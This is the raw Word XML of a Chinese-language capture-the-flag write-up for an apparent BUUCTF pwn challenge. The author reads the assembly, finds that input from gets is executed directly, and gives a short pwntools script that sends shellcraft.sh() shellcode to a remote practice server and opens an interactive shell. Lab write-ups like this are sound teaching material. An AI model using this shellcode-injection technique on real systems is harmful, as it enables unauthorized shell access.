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4806" w14:textId="506B3D67" w:rsidR="00FD65A1" w:rsidRDefault="00AA136B" w:rsidP="00975A74">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下主函数我感觉这道题还是挺新的这道题不能f5所以我们只能看汇编代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA136B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FC73716" wp14:editId="13582FD4">
            <wp:extent cx="5274310" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="464679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79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E065" w14:textId="1A668C38" w:rsidR="00975A74" w:rsidRDefault="00975A74" w:rsidP="00975A74">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们看到vuln函数，然后报错的位置看一眼是调用了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是lea指令将ebp+var_A0调用给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，也就是相当于调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp+var_A0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77534EA1" w14:textId="5E9232ED" w:rsidR="00975A74" w:rsidRDefault="00975A74" w:rsidP="00975A74">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00975A74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B89101" wp14:editId="289FA436">
            <wp:extent cx="5153744" cy="5992061"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="1687463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63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4BD3" w14:textId="79B87886" w:rsidR="00975A74" w:rsidRDefault="00975A74" w:rsidP="00975A74">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gets函数的参数只有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp+arg_0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个调用给gets，所以说明我们写入的他会直接调用wp就很简单了</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F49F52" wp14:editId="53693AC6">
            <wp:extent cx="5274310" cy="1518285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="179338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A760" w14:textId="6C7AF31D" w:rsidR="00975A74" w:rsidRPr="00975A74" w:rsidRDefault="00975A74" w:rsidP="00975A74">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么看出来他俩相等的就是gets只有一个参数就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ebp+arg_0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而给vuln就传了一个参数就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00975A74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ebp+var_A0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以两个相等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466EE17" w14:textId="35AF4C7D" w:rsidR="00975A74" w:rsidRDefault="00975A74" w:rsidP="00E84610">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEF765" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610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142596A4" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 连接远程服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110C6DB" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p = remote('node3.buuoj.cn', 29126)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA978A7" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 发送 shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F86883F" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610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p.sendline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asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(shellcraft.sh()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5725955A" w14:textId="77777777" w:rsidR="00E84610" w:rsidRDefault="00E84610" w:rsidP="00E84610">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 交互模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AAE8BD" w14:textId="57DF8DF0" w:rsidR="00E84610" w:rsidRPr="00975A74" w:rsidRDefault="00E84610" w:rsidP="00E84610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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E84610" w:rsidRPr="00975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84E4" w14:textId="77777777" w:rsidR="00C91CAE" w:rsidRDefault="00C91CAE" w:rsidP="00AA13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81A4E2" w14:textId="77777777" w:rsidR="00C91CAE" w:rsidRDefault="00C91CAE" w:rsidP="00AA13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7FAF9" w14:textId="77777777" w:rsidR="00C91CAE" w:rsidRDefault="00C91CAE" w:rsidP="00AA13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FC0D1C" w14:textId="77777777" w:rsidR="00C91CAE" w:rsidRDefault="00C91CAE" w:rsidP="00AA13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74D96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05C6DD2E"/>
    <w:lvl w:ilvl="0" w:tplc="45CE80B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7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A1"/>
    <w:rsid w:val="002A6A06"/>
    <w:rsid w:val="003A6495"/>
    <w:rsid w:val="006F25A2"/>
    <w:rsid w:val="00975A74"/>
    <w:rsid w:val="00AA136B"/>
    <w:rsid w:val="00C91CAE"/>
    <w:rsid w:val="00E84610"/>
    <w:rsid w:val="00F83372"/>
    <w:rsid w:val="00FD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5204A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{03AE34B6-E4DC-4354-8CFA-4BFAD609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65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5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5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5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5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5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5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5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65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6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6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65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65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65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65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65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65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65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5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65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65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65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65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6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65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65A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13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13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13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13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189</Words>
  <Characters>194</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>10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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-16T12:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T12:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>